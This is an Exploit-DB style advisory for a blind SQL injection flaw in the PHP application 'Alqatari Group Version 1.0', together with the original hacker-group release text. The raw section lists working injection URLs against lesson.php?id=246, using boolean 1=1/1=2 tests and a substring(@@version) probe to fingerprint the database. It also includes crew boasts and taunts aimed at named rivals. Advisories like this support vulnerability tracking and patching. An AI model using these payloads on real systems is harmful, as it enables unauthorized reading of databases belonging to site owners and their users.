Alqatari group Version 1.0 Blind SQL Injection Vulnerability

vendor:

Alqatari Group Version 1.0

by:

Red-D3v1L

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Alqatari Group Version 1.0

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:alqatari_group:alqatari_group_version_1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Alqatari group Version 1.0 Blind SQL Injection Vulnerability

Alqatari group Version 1.0 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the server. The attacker can use the true/false condition to check if the query is valid or not. For example, sending a request with 'id=246 and 1=1' will return true and 'id=246 and 1=2' will return false.

Mitigation:

Input validation and parameterized queries can be used to mitigate this vulnerability.

Source

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _          
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_1_0 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
 
    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] Alqatari group Version 1.0 Blind SQL Injection Vulnerability
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] For Ask:              [r-d@passport.com]
    [?] Script:               [ Alqatari group Version 1.0 ]
    [?] Language:             [ PHP ]
    [?] Founder:              [ Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] n00bz :               [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..]
########################################################################
   
===[ Exploit SQL Blind ]===

   
[»]Exploit : 

http://server/lesson.php?id=246%20and%201=1 << this true

http://server/lesson.php?id=246%20and%201=2 << this faulse


http://server/lesson.php?id=246%20and%20substring%28@@version,1,1%29=5 << this true

http://server/lesson.php?id=246%20and%20substring%28@@version,1,1%29=4 << this faulse


./Greetz For All my Frindes 


 
==============================================================================
 
#sEc-r1z.com Str1kEz y0u !